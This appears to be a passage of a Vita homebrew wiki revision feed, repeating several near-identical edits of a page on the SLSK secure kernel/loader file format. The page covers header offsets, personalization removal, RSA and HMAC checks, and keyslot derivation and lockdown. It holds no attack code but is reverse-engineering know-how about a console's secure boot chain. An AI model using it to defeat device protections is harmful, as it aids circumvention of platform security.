Using keyslot 0x208+aes_key_revision and metadata buffer (0xE0 offset for 0x20 bytes) the code decryption key is derived and put into keyslot 10. Then, 5 more keys are derived in the same way, using seed data [0x100; 0x19F]. These 5 keys are put into keyslots 11, 12, 13, 14, 15.<br />
<br />
Keyslots 0x208, 0x209, 0x20A, 0x20B, 0x20C, 0x20D (all possible AES key revision keys) are protected.<br />
<br />
Data at [0x1A0; 0x1C0) is decrypted using keyslot 10. This is HMAC-SHA256 of the code segment. HMAC-SHA256 is calculated over the code segment using keyslot 0x20, then keyslot 0x20 is protected. Finally, the calculated hmac is compared to the decrypted one.<br />
<br />
=== Protecting the keys ===<br />
<br />
Some keys are protected, depending on bit flags buffer located right after plaintext version string (so, at offset 0x50). However, on the latest 3.68 enc it is all zeroes so no keys should be protected by this function (?)<br />
<br />
=== Decrypting code ===<br />
<br />
Code is decrypted using key 10. Then, the key is protected.<br />
<br />
=== Clear ===<br />
<br />
The remainder (0x1C000 - code_sz) after the decrypted code is cleared with dmac. Dmac regs are also cleared.</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=SLSK&diff=9520SLSK2018-07-28T19:48:25Z<p>Xyz: /* Remove personalization */</p>
<hr />
<div><br />
{| class="wikitable"<br />
|-<br />
! Offset !! Size !! Description<br />
|-<br />
| 0x0 || 0x4 || <code>0x64B2C8E5</code> magic<br />
|-<br />
| 0x4 || 0x4 || Offset to code<br />
|-<br />
| 0x8 || 0x4 || Size of plaintext version string, 0 on 0.931, 0x10 on other<br />
|-<br />
| 0xC || 0x4 || Size of unknown block, only seen as 0<br />
|-<br />
| 0x10 || 0x4 || Code size<br />
|-<br />
| 0x14 || 0x2 || AES key revision, possible values 0 to 5<br />
|-<br />
| 0x16 || 0x2 || Public key revision, possible values 0 to 15<br />
|-<br />
| 0x18 || 0x8 || Unknown/zero<br />
|-<br />
| 0x20 || 0x20 || sha256 hash of decrypted body<br />
|-<br />
| 0x40 || 0x10 || Version in ASCII, not present on 0.931<br />
|-<br />
| 0x50 (0x40 on 0.931) || 0x90 || Zero<br />
|-<br />
| 0xE0 (0xD0 on 0.931) || Until Data || Encrypted Header<br />
|-<br />
|}<br />
<br />
== Encrypted Header ==<br />
<br />
At offset 0xE0 there is a 0x1E0 sized buffer that is speculated to be an encrypted header. For any given firmware version, secure_kernel.enc/second_loader.enc and secure_kernel.enp/second_loader.enp share the first 0xC0 bytes. For non-retail PUPs, each SLSK share the first 0xC0 bytes as observed in 0.931, 0.995, 1.000.41. Similarly in retail PUPs, each SLSK also share the first 0xC0 bytes as observed in 1.05 and 3.60. However, the bytes differ from retail and non-retail SLSK.<br />
<br />
There is likely a 0xC0 sized "common" header that is shared by every firmware and by both secure_kernel and second_loader but different between retail and non-retail builds. Then there is likely a 0x20 byte section that is unique per SLSK (maybe contains version, size, load offset, etc). Then a 0x100 byte RSA-2048 signature of the header.<br />
<br />
== Signature ==<br />
<br />
The last 0x340 bytes of each SLSK is not personalized. For both secure_kernel and second_loader, both the enc and enp variants share the last 0x340 bytes (although they differ from each other and across firmwares). This is likely the signature and might also contain certificates.<br />
<br />
== Bootrom enc loading process ==<br />
<br />
=== Remove personalization ===<br />
<br />
First, personalization layer is removed. It uses AES-128-CBC with a derived key and decrypts data at ENC+0xE0 (or ENC+0xD0 if there's no plaintext version) for size of code_size+0x1E0.<br />
<br />
There are two possible paths to derive the key used to remove personalization. Normally, the key is derived using keyslot 0x206. There's however an alternative path, triggered in secret debug mode, when instead the keyslot 0x207 is used with a different seed.<br />
<br />
Once personalization is removed, the source keys are locked down. Keyslots 0x9, 0x206, 0x207 are locked down completely (leaving only 0xA0 protection). However, keyslot 0x8 allows encryption, this lets update manager SM add personalization layer during update without having to derive the keys itself.<br />
<br />
=== Header RSA check ===<br />
<br />
A key is derived from keyslot 0x344 and put into keyslot 0x20. This key is then immediately used to calculate HMAC-SHA256 over enc header, excluding the RSA sig (typically 0x00 to 0x1C0).<br />
<br />
2 bytes are read from keyring slot 0x603 is read. This is the bitmask of allowed RSA public keys (0xFFFF on 1.692). If the mask is zero, a hardcoded RSA modulus is used. Otherwise, it checks enc rsa revision against the mask and if it's allowed, it gets the modulus from keyring RSA storage starting at keyslot 0x700.<br />
<br />
The signature is typically located at 0x1C0 and is 0x100 bytes. After calculating powmod, it checks the padding and compares previously calculated HMAC-SHA256 against the contents.<br />
<br />
Finally, it protects keyslots 0x700 to 0x77F to disable f00d reading out the modulus. However, only reading is protected, it should still be possible to encrypt/decrypt using these keyslots.<br />
<br />
=== Metadata decryption and code verification ===<br />
<br />
Using keyslot 0x208+aes_key_revision and metadata buffer (0xE0 offset for 0x20 bytes) the code decryption key is derived and put into keyslot 10. Then, 5 more keys are derived in the same way, using seed data [0x100; 0x19F]. These 5 keys are put into keyslots 11, 12, 13, 14, 15.<br />
<br />
Keyslots 0x208, 0x209, 0x20A, 0x20B, 0x20C, 0x20D (all possible AES key revision keys) are protected.<br />
<br />
Data at [0x1A0; 0x1C0) is decrypted using keyslot 10. This is HMAC-SHA256 of the code segment. HMAC-SHA256 is calculated over the code segment using keyslot 0x20, then keyslot 0x20 is protected. Finally, the calculated hmac is compared to the decrypted one.<br />
<br />
=== Protecting the keys ===<br />
<br />
Some keys are protected, depending on bit flags buffer located right after plaintext version string (so, at offset 0x50). However, on the latest 3.68 enc it is all zeroes so no keys should be protected by this function (?)<br />
<br />
=== Decrypting code ===<br />
<br />
Code is decrypted using key 10. Then, the key is protected.<br />
<br />
=== Clear ===<br />
<br />
The remainder (0x1C000 - code_sz) after the decrypted code is cleared with dmac. Dmac regs are also cleared.</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=SLSK&diff=9519SLSK2018-07-28T19:47:42Z<p>Xyz: /* Header RSA check */</p>
<hr />
<div><br />
{| class="wikitable"<br />
|-<br />
! Offset !! Size !! Description<br />
|-<br />
| 0x0 || 0x4 || <code>0x64B2C8E5</code> magic<br />
|-<br />
| 0x4 || 0x4 || Offset to code<br />
|-<br />
| 0x8 || 0x4 || Size of plaintext version string, 0 on 0.931, 0x10 on other<br />
|-<br />
| 0xC || 0x4 || Size of unknown block, only seen as 0<br />
|-<br />
| 0x10 || 0x4 || Code size<br />
|-<br />
| 0x14 || 0x2 || AES key revision, possible values 0 to 5<br />
|-<br />
| 0x16 || 0x2 || Public key revision, possible values 0 to 15<br />
|-<br />
| 0x18 || 0x8 || Unknown/zero<br />
|-<br />
| 0x20 || 0x20 || sha256 hash of decrypted body<br />
|-<br />
| 0x40 || 0x10 || Version in ASCII, not present on 0.931<br />
|-<br />
| 0x50 (0x40 on 0.931) || 0x90 || Zero<br />
|-<br />
| 0xE0 (0xD0 on 0.931) || Until Data || Encrypted Header<br />
|-<br />
|}<br />
<br />
== Encrypted Header ==<br />
<br />
At offset 0xE0 there is a 0x1E0 sized buffer that is speculated to be an encrypted header. For any given firmware version, secure_kernel.enc/second_loader.enc and secure_kernel.enp/second_loader.enp share the first 0xC0 bytes. For non-retail PUPs, each SLSK share the first 0xC0 bytes as observed in 0.931, 0.995, 1.000.41. Similarly in retail PUPs, each SLSK also share the first 0xC0 bytes as observed in 1.05 and 3.60. However, the bytes differ from retail and non-retail SLSK.<br />
<br />
There is likely a 0xC0 sized "common" header that is shared by every firmware and by both secure_kernel and second_loader but different between retail and non-retail builds. Then there is likely a 0x20 byte section that is unique per SLSK (maybe contains version, size, load offset, etc). Then a 0x100 byte RSA-2048 signature of the header.<br />
<br />
== Signature ==<br />
<br />
The last 0x340 bytes of each SLSK is not personalized. For both secure_kernel and second_loader, both the enc and enp variants share the last 0x340 bytes (although they differ from each other and across firmwares). This is likely the signature and might also contain certificates.<br />
<br />
== Bootrom enc loading process ==<br />
<br />
=== Remove personalization ===<br />
<br />
First, personalization layer is removed. It uses AES-128-CBC with a derived key and decrypts data at ENC+0xE0 (or ENC+0xD0 if there's no plaintext version) for size of code_size+0x1E0.<br />
<br />
There are two possible paths to derive the key used to remove personalization. Normally, the key is derived using keyslot 0x206. There's however an alternative path, triggered in secret debug mode, when instead the keyslot 0x207 is used with a different plaintext.<br />
<br />
Once personalization is removed, the source keys are locked down. Keyslots 0x9, 0x206, 0x207 are locked down completely (leaving only 0xA0 protection). However, keyslot 0x8 allows encryption, this lets update manager SM add personalization layer during update without having to derive the keys itself.<br />
<br />
=== Header RSA check ===<br />
<br />
A key is derived from keyslot 0x344 and put into keyslot 0x20. This key is then immediately used to calculate HMAC-SHA256 over enc header, excluding the RSA sig (typically 0x00 to 0x1C0).<br />
<br />
2 bytes are read from keyring slot 0x603 is read. This is the bitmask of allowed RSA public keys (0xFFFF on 1.692). If the mask is zero, a hardcoded RSA modulus is used. Otherwise, it checks enc rsa revision against the mask and if it's allowed, it gets the modulus from keyring RSA storage starting at keyslot 0x700.<br />
<br />
The signature is typically located at 0x1C0 and is 0x100 bytes. After calculating powmod, it checks the padding and compares previously calculated HMAC-SHA256 against the contents.<br />
<br />
Finally, it protects keyslots 0x700 to 0x77F to disable f00d reading out the modulus. However, only reading is protected, it should still be possible to encrypt/decrypt using these keyslots.<br />
<br />
=== Metadata decryption and code verification ===<br />
<br />
Using keyslot 0x208+aes_key_revision and metadata buffer (0xE0 offset for 0x20 bytes) the code decryption key is derived and put into keyslot 10. Then, 5 more keys are derived in the same way, using seed data [0x100; 0x19F]. These 5 keys are put into keyslots 11, 12, 13, 14, 15.<br />
<br />
Keyslots 0x208, 0x209, 0x20A, 0x20B, 0x20C, 0x20D (all possible AES key revision keys) are protected.<br />
<br />
Data at [0x1A0; 0x1C0) is decrypted using keyslot 10. This is HMAC-SHA256 of the code segment. HMAC-SHA256 is calculated over the code segment using keyslot 0x20, then keyslot 0x20 is protected. Finally, the calculated hmac is compared to the decrypted one.<br />
<br />
=== Protecting the keys ===<br />
<br />
Some keys are protected, depending on bit flags buffer located right after plaintext version string (so, at offset 0x50). However, on the latest 3.68 enc it is all zeroes so no keys should be protected by this function (?)<br />
<br />
=== Decrypting code ===<br />
<br />
Code is decrypted using key 10. Then, the key is protected.<br />
<br />
=== Clear ===<br />
<br />
The remainder (0x1C000 - code_sz) after the decrypted code is cleared with dmac. Dmac regs are also cleared.</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=SLSK&diff=9518SLSK2018-07-28T19:46:39Z<p>Xyz: /* Memset */</p>
<hr />
<div><br />
{| class="wikitable"<br />
|-<br />
! Offset !! Size !! Description<br />
|-<br />
| 0x0 || 0x4 || <code>0x64B2C8E5</code> magic<br />
|-<br />
| 0x4 || 0x4 || Offset to code<br />
|-<br />
| 0x8 || 0x4 || Size of plaintext version string, 0 on 0.931, 0x10 on other<br />
|-<br />
| 0xC || 0x4 || Size of unknown block, only seen as 0<br />
|-<br />
| 0x10 || 0x4 || Code size<br />
|-<br />
| 0x14 || 0x2 || AES key revision, possible values 0 to 5<br />
|-<br />
| 0x16 || 0x2 || Public key revision, possible values 0 to 15<br />
|-<br />
| 0x18 || 0x8 || Unknown/zero<br />
|-<br />
| 0x20 || 0x20 || sha256 hash of decrypted body<br />
|-<br />
| 0x40 || 0x10 || Version in ASCII, not present on 0.931<br />
|-<br />
| 0x50 (0x40 on 0.931) || 0x90 || Zero<br />
|-<br />
| 0xE0 (0xD0 on 0.931) || Until Data || Encrypted Header<br />
|-<br />
|}<br />
<br />
== Encrypted Header ==<br />
<br />
At offset 0xE0 there is a 0x1E0 sized buffer that is speculated to be an encrypted header. For any given firmware version, secure_kernel.enc/second_loader.enc and secure_kernel.enp/second_loader.enp share the first 0xC0 bytes. For non-retail PUPs, each SLSK share the first 0xC0 bytes as observed in 0.931, 0.995, 1.000.41. Similarly in retail PUPs, each SLSK also share the first 0xC0 bytes as observed in 1.05 and 3.60. However, the bytes differ from retail and non-retail SLSK.<br />
<br />
There is likely a 0xC0 sized "common" header that is shared by every firmware and by both secure_kernel and second_loader but different between retail and non-retail builds. Then there is likely a 0x20 byte section that is unique per SLSK (maybe contains version, size, load offset, etc). Then a 0x100 byte RSA-2048 signature of the header.<br />
<br />
== Signature ==<br />
<br />
The last 0x340 bytes of each SLSK is not personalized. For both secure_kernel and second_loader, both the enc and enp variants share the last 0x340 bytes (although they differ from each other and across firmwares). This is likely the signature and might also contain certificates.<br />
<br />
== Bootrom enc loading process ==<br />
<br />
=== Remove personalization ===<br />
<br />
First, personalization layer is removed. It uses AES-128-CBC with a derived key and decrypts data at ENC+0xE0 (or ENC+0xD0 if there's no plaintext version) for size of code_size+0x1E0.<br />
<br />
There are two possible paths to derive the key used to remove personalization. Normally, the key is derived using keyslot 0x206. There's however an alternative path, triggered in secret debug mode, when instead the keyslot 0x207 is used with a different plaintext.<br />
<br />
Once personalization is removed, the source keys are locked down. Keyslots 0x9, 0x206, 0x207 are locked down completely (leaving only 0xA0 protection). However, keyslot 0x8 allows encryption, this lets update manager SM add personalization layer during update without having to derive the keys itself.<br />
<br />
=== Header RSA check ===<br />
<br />
A key is derived from keyslot 0x344 and put into keyslot 0x20. This key is then immediately used to calculate HMAC-SHA256 over enc header, excluding the RSA sig (typically 0x00 to 0x1C0).<br />
<br />
2 bytes are read from keyring slot 0x603 is read. This is the bitmask of allowed RSA public keys (0xFFFF on 1.692). If the mask is zero, a hardcoded RSA modulus is used. Otherwise, it checks enc rsa revision against the mask and if it's allowed, it gets the modulus from keyring RSA storage starting at keyslot 0x700.<br />
<br />
The signature is typically located at 0x1C0 and is 0x100 bytes. After calculating powmod, it checks the padding and compares previously calculated HMAC-SHA256 against the contents.<br />
<br />
Finally, it protects keyslots 0x700 to 0x77F to disable f00d reading out the modulus.<br />
<br />
=== Metadata decryption and code verification ===<br />
<br />
Using keyslot 0x208+aes_key_revision and metadata buffer (0xE0 offset for 0x20 bytes) the code decryption key is derived and put into keyslot 10. Then, 5 more keys are derived in the same way, using seed data [0x100; 0x19F]. These 5 keys are put into keyslots 11, 12, 13, 14, 15.<br />
<br />
Keyslots 0x208, 0x209, 0x20A, 0x20B, 0x20C, 0x20D (all possible AES key revision keys) are protected.<br />
<br />
Data at [0x1A0; 0x1C0) is decrypted using keyslot 10. This is HMAC-SHA256 of the code segment. HMAC-SHA256 is calculated over the code segment using keyslot 0x20, then keyslot 0x20 is protected. Finally, the calculated hmac is compared to the decrypted one.<br />
<br />
=== Protecting the keys ===<br />
<br />
Some keys are protected, depending on bit flags buffer located right after plaintext version string (so, at offset 0x50). However, on the latest 3.68 enc it is all zeroes so no keys should be protected by this function (?)<br />
<br />
=== Decrypting code ===<br />
<br />
Code is decrypted using key 10. Then, the key is protected.<br />
<br />
=== Clear ===<br />
<br />
The remainder (0x1C000 - code_sz) after the decrypted code is cleared with dmac. Dmac regs are also cleared.</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=SLSK&diff=9517SLSK2018-07-28T19:46:21Z<p>Xyz: /* Bootrom enc loading process */</p>
<hr />
<div><br />
{| class="wikitable"<br />
|-<br />
! Offset !! Size !! Description<br />
|-<br />
| 0x0 || 0x4 || <code>0x64B2C8E5</code> magic<br />
|-<br />
| 0x4 || 0x4 || Offset to code<br />
|-<br />
| 0x8 || 0x4 || Size of plaintext version string, 0 on 0.931, 0x10 on other<br />
|-<br />
| 0xC || 0x4 || Size of unknown block, only seen as 0<br />
|-<br />
| 0x10 || 0x4 || Code size<br />
|-<br />
| 0x14 || 0x2 || AES key revision, possible values 0 to 5<br />
|-<br />
| 0x16 || 0x2 || Public key revision, possible values 0 to 15<br />
|-<br />
| 0x18 || 0x8 || Unknown/zero<br />
|-<br />
| 0x20 || 0x20 || sha256 hash of decrypted body<br />
|-<br />
| 0x40 || 0x10 || Version in ASCII, not present on 0.931<br />
|-<br />
| 0x50 (0x40 on 0.931) || 0x90 || Zero<br />
|-<br />
| 0xE0 (0xD0 on 0.931) || Until Data || Encrypted Header<br />
|-<br />
|}<br />
<br />
== Encrypted Header ==<br />
<br />
At offset 0xE0 there is a 0x1E0 sized buffer that is speculated to be an encrypted header. For any given firmware version, secure_kernel.enc/second_loader.enc and secure_kernel.enp/second_loader.enp share the first 0xC0 bytes. For non-retail PUPs, each SLSK share the first 0xC0 bytes as observed in 0.931, 0.995, 1.000.41. Similarly in retail PUPs, each SLSK also share the first 0xC0 bytes as observed in 1.05 and 3.60. However, the bytes differ from retail and non-retail SLSK.<br />
<br />
There is likely a 0xC0 sized "common" header that is shared by every firmware and by both secure_kernel and second_loader but different between retail and non-retail builds. Then there is likely a 0x20 byte section that is unique per SLSK (maybe contains version, size, load offset, etc). Then a 0x100 byte RSA-2048 signature of the header.<br />
<br />
== Signature ==<br />
<br />
The last 0x340 bytes of each SLSK is not personalized. For both secure_kernel and second_loader, both the enc and enp variants share the last 0x340 bytes (although they differ from each other and across firmwares). This is likely the signature and might also contain certificates.<br />
<br />
== Bootrom enc loading process ==<br />
<br />
=== Remove personalization ===<br />
<br />
First, personalization layer is removed. It uses AES-128-CBC with a derived key and decrypts data at ENC+0xE0 (or ENC+0xD0 if there's no plaintext version) for size of code_size+0x1E0.<br />
<br />
There are two possible paths to derive the key used to remove personalization. Normally, the key is derived using keyslot 0x206. There's however an alternative path, triggered in secret debug mode, when instead the keyslot 0x207 is used with a different plaintext.<br />
<br />
Once personalization is removed, the source keys are locked down. Keyslots 0x9, 0x206, 0x207 are locked down completely (leaving only 0xA0 protection). However, keyslot 0x8 allows encryption, this lets update manager SM add personalization layer during update without having to derive the keys itself.<br />
<br />
=== Header RSA check ===<br />
<br />
A key is derived from keyslot 0x344 and put into keyslot 0x20. This key is then immediately used to calculate HMAC-SHA256 over enc header, excluding the RSA sig (typically 0x00 to 0x1C0).<br />
<br />
2 bytes are read from keyring slot 0x603 is read. This is the bitmask of allowed RSA public keys (0xFFFF on 1.692). If the mask is zero, a hardcoded RSA modulus is used. Otherwise, it checks enc rsa revision against the mask and if it's allowed, it gets the modulus from keyring RSA storage starting at keyslot 0x700.<br />
<br />
The signature is typically located at 0x1C0 and is 0x100 bytes. After calculating powmod, it checks the padding and compares previously calculated HMAC-SHA256 against the contents.<br />
<br />
Finally, it protects keyslots 0x700 to 0x77F to disable f00d reading out the modulus.<br />
<br />
=== Metadata decryption and code verification ===<br />
<br />
Using keyslot 0x208+aes_key_revision and metadata buffer (0xE0 offset for 0x20 bytes) the code decryption key is derived and put into keyslot 10. Then, 5 more keys are derived in the same way, using seed data [0x100; 0x19F]. These 5 keys are put into keyslots 11, 12, 13, 14, 15.<br />
<br />
Keyslots 0x208, 0x209, 0x20A, 0x20B, 0x20C, 0x20D (all possible AES key revision keys) are protected.<br />
<br />
Data at [0x1A0; 0x1C0) is decrypted using keyslot 10. This is HMAC-SHA256 of the code segment. HMAC-SHA256 is calculated over the code segment using keyslot 0x20, then keyslot 0x20 is protected. Finally, the calculated hmac is compared to the decrypted one.<br />
<br />
=== Protecting the keys ===<br />
<br />
Some keys are protected, depending on bit flags buffer located right after plaintext version string (so, at offset 0x50). However, on the latest 3.68 enc it is all zeroes so no keys should be protected by this function (?)<br />
<br />
=== Decrypting code ===<br />
<br />
Code is decrypted using key 10. Then, the key is protected.<br />
<br />
=== Memset ===<br />
<br />
The remainder (0x1C000 - code_sz) after the decrypted code is cleared with dmac.</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=SLSK&diff=9516SLSK2018-07-28T19:45:09Z<p>Xyz: /* Protecting the keys */</p>
<hr />
<div><br />
{| class="wikitable"<br />
|-<br />
! Offset !! Size !! Description<br />
|-<br />
| 0x0 || 0x4 || <code>0x64B2C8E5</code> magic<br />
|-<br />
| 0x4 || 0x4 || Offset to code<br />
|-<br />
| 0x8 || 0x4 || Size of plaintext version string, 0 on 0.931, 0x10 on other<br />
|-<br />
| 0xC || 0x4 || Size of unknown block, only seen as 0<br />
|-<br />
| 0x10 || 0x4 || Code size<br />
|-<br />
| 0x14 || 0x2 || AES key revision, possible values 0 to 5<br />
|-<br />
| 0x16 || 0x2 || Public key revision, possible values 0 to 15<br />
|-<br />
| 0x18 || 0x8 || Unknown/zero<br />
|-<br />
| 0x20 || 0x20 || sha256 hash of decrypted body<br />
|-<br />
| 0x40 || 0x10 || Version in ASCII, not present on 0.931<br />
|-<br />
| 0x50 (0x40 on 0.931) || 0x90 || Zero<br />
|-<br />
| 0xE0 (0xD0 on 0.931) || Until Data || Encrypted Header<br />
|-<br />
|}<br />
<br />
== Encrypted Header ==<br />
<br />
At offset 0xE0 there is a 0x1E0 sized buffer that is speculated to be an encrypted header. For any given firmware version, secure_kernel.enc/second_loader.enc and secure_kernel.enp/second_loader.enp share the first 0xC0 bytes. For non-retail PUPs, each SLSK share the first 0xC0 bytes as observed in 0.931, 0.995, 1.000.41. Similarly in retail PUPs, each SLSK also share the first 0xC0 bytes as observed in 1.05 and 3.60. However, the bytes differ from retail and non-retail SLSK.<br />
<br />
There is likely a 0xC0 sized "common" header that is shared by every firmware and by both secure_kernel and second_loader but different between retail and non-retail builds. Then there is likely a 0x20 byte section that is unique per SLSK (maybe contains version, size, load offset, etc). Then a 0x100 byte RSA-2048 signature of the header.<br />
<br />
== Signature ==<br />
<br />
The last 0x340 bytes of each SLSK is not personalized. For both secure_kernel and second_loader, both the enc and enp variants share the last 0x340 bytes (although they differ from each other and across firmwares). This is likely the signature and might also contain certificates.<br />
<br />
== Bootrom enc loading process ==<br />
<br />
=== Remove personalization ===<br />
<br />
First, personalization layer is removed. It uses AES-128-CBC with a derived key and decrypts data at ENC+0xE0 (or ENC+0xD0 if there's no plaintext version) for size of code_size+0x1E0.<br />
<br />
There are two possible paths to derive the key used to remove personalization. Normally, the key is derived using keyslot 0x206. There's however an alternative path, triggered in secret debug mode, when instead the keyslot 0x207 is used with a different plaintext.<br />
<br />
Once personalization is removed, the source keys are locked down. Keyslots 0x9, 0x206, 0x207 are locked down completely (leaving only 0xA0 protection). However, keyslot 0x8 allows encryption, this lets update manager SM add personalization layer during update without having to derive the keys itself.<br />
<br />
=== Header RSA check ===<br />
<br />
A key is derived from keyslot 0x344 and put into keyslot 0x20. This key is then immediately used to calculate HMAC-SHA256 over enc header, excluding the RSA sig (typically 0x00 to 0x1C0).<br />
<br />
2 bytes are read from keyring slot 0x603 is read. This is the bitmask of allowed RSA public keys (0xFFFF on 1.692). If the mask is zero, a hardcoded RSA modulus is used. Otherwise, it checks enc rsa revision against the mask and if it's allowed, it gets the modulus from keyring RSA storage starting at keyslot 0x700.<br />
<br />
The signature is typically located at 0x1C0 and is 0x100 bytes. After calculating powmod, it checks the padding and compares previously calculated HMAC-SHA256 against the contents.<br />
<br />
Finally, it protects keyslots 0x700 to 0x77F to disable f00d reading out the modulus.<br />
<br />
=== Metadata decryption and code verification ===<br />
<br />
Using keyslot 0x208+aes_key_revision and metadata buffer (0xE0 offset for 0x20 bytes) the code decryption key is derived and put into keyslot 10. Then, 5 more keys are derived in the same way, using seed data [0x100; 0x19F]. These 5 keys are put into keyslots 11, 12, 13, 14, 15.<br />
<br />
Keyslots 0x208, 0x209, 0x20A, 0x20B, 0x20C, 0x20D (all possible AES key revision keys) are protected.<br />
<br />
Data at [0x1A0; 0x1C0) is decrypted using keyslot 10. This is HMAC-SHA256 of the code segment. HMAC-SHA256 is calculated over the code segment using keyslot 0x20, then keyslot 0x20 is protected. Finally, the calculated hmac is compared to the decrypted one.<br />
<br />
=== Protecting the keys ===<br />
<br />
Some keys are protected, depending on bit flags buffer located right after plaintext version string (so, at offset 0x50). However, on the latest 3.68 enc it is all zeroes so no keys should be protected by this function (?)</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=SLSK&diff=9515SLSK2018-07-28T19:45:02Z<p>Xyz: /* Bootrom enc loading process */</p>
<hr />
<div><br />
{| class="wikitable"<br />
|-<br />
! Offset !! Size !! Description<br />
|-<br />
| 0x0 || 0x4 || <code>0x64B2C8E5</code> magic<br />
|-<br />
| 0x4 || 0x4 || Offset to code<br />
|-<br />
| 0x8 || 0x4 || Size of plaintext version string, 0 on 0.931, 0x10 on other<br />
|-<br />
| 0xC || 0x4 || Size of unknown block, only seen as 0<br />
|-<br />
| 0x10 || 0x4 || Code size<br />
|-<br />
| 0x14 || 0x2 || AES key revision, possible values 0 to 5<br />
|-<br />
| 0x16 || 0x2 || Public key revision, possible values 0 to 15<br />
|-<br />
| 0x18 || 0x8 || Unknown/zero<br />
|-<br />
| 0x20 || 0x20 || sha256 hash of decrypted body<br />
|-<br />
| 0x40 || 0x10 || Version in ASCII, not present on 0.931<br />
|-<br />
| 0x50 (0x40 on 0.931) || 0x90 || Zero<br />
|-<br />
| 0xE0 (0xD0 on 0.931) || Until Data || Encrypted Header<br />
|-<br />
|}<br />
<br />
== Encrypted Header ==<br />
<br />
At offset 0xE0 there is a 0x1E0 sized buffer that is speculated to be an encrypted header. For any given firmware version, secure_kernel.enc/second_loader.enc and secure_kernel.enp/second_loader.enp share the first 0xC0 bytes. For non-retail PUPs, each SLSK share the first 0xC0 bytes as observed in 0.931, 0.995, 1.000.41. Similarly in retail PUPs, each SLSK also share the first 0xC0 bytes as observed in 1.05 and 3.60. However, the bytes differ from retail and non-retail SLSK.<br />
<br />
There is likely a 0xC0 sized "common" header that is shared by every firmware and by both secure_kernel and second_loader but different between retail and non-retail builds. Then there is likely a 0x20 byte section that is unique per SLSK (maybe contains version, size, load offset, etc). Then a 0x100 byte RSA-2048 signature of the header.<br />
<br />
== Signature ==<br />
<br />
The last 0x340 bytes of each SLSK is not personalized. For both secure_kernel and second_loader, both the enc and enp variants share the last 0x340 bytes (although they differ from each other and across firmwares). This is likely the signature and might also contain certificates.<br />
<br />
== Bootrom enc loading process ==<br />
<br />
=== Remove personalization ===<br />
<br />
First, personalization layer is removed. It uses AES-128-CBC with a derived key and decrypts data at ENC+0xE0 (or ENC+0xD0 if there's no plaintext version) for size of code_size+0x1E0.<br />
<br />
There are two possible paths to derive the key used to remove personalization. Normally, the key is derived using keyslot 0x206. There's however an alternative path, triggered in secret debug mode, when instead the keyslot 0x207 is used with a different plaintext.<br />
<br />
Once personalization is removed, the source keys are locked down. Keyslots 0x9, 0x206, 0x207 are locked down completely (leaving only 0xA0 protection). However, keyslot 0x8 allows encryption, this lets update manager SM add personalization layer during update without having to derive the keys itself.<br />
<br />
=== Header RSA check ===<br />
<br />
A key is derived from keyslot 0x344 and put into keyslot 0x20. This key is then immediately used to calculate HMAC-SHA256 over enc header, excluding the RSA sig (typically 0x00 to 0x1C0).<br />
<br />
2 bytes are read from keyring slot 0x603 is read. This is the bitmask of allowed RSA public keys (0xFFFF on 1.692). If the mask is zero, a hardcoded RSA modulus is used. Otherwise, it checks enc rsa revision against the mask and if it's allowed, it gets the modulus from keyring RSA storage starting at keyslot 0x700.<br />
<br />
The signature is typically located at 0x1C0 and is 0x100 bytes. After calculating powmod, it checks the padding and compares previously calculated HMAC-SHA256 against the contents.<br />
<br />
Finally, it protects keyslots 0x700 to 0x77F to disable f00d reading out the modulus.<br />
<br />
=== Metadata decryption and code verification ===<br />
<br />
Using keyslot 0x208+aes_key_revision and metadata buffer (0xE0 offset for 0x20 bytes) the code decryption key is derived and put into keyslot 10. Then, 5 more keys are derived in the same way, using seed data [0x100; 0x19F]. These 5 keys are put into keyslots 11, 12, 13, 14, 15.<br />
<br />
Keyslots 0x208, 0x209, 0x20A, 0x20B, 0x20C, 0x20D (all possible AES key revision keys) are protected.<br />
<br />
Data at [0x1A0; 0x1C0) is decrypted using keyslot 10. This is HMAC-SHA256 of the code segment. HMAC-SHA256 is calculated over the code segment using keyslot 0x20, then keyslot 0x20 is protected. Finally, the calculated hmac is compared to the decrypted one.<br />
<br />
=== Protecting the keys ===<br />
<br />
Some keys are protecting, depending on bit flags buffer located right after plaintext version string (so, at offset 0x50). However, on the latest 3.68 enc it is all zeroes so no keys should be protected by this function (?)</div>Xyz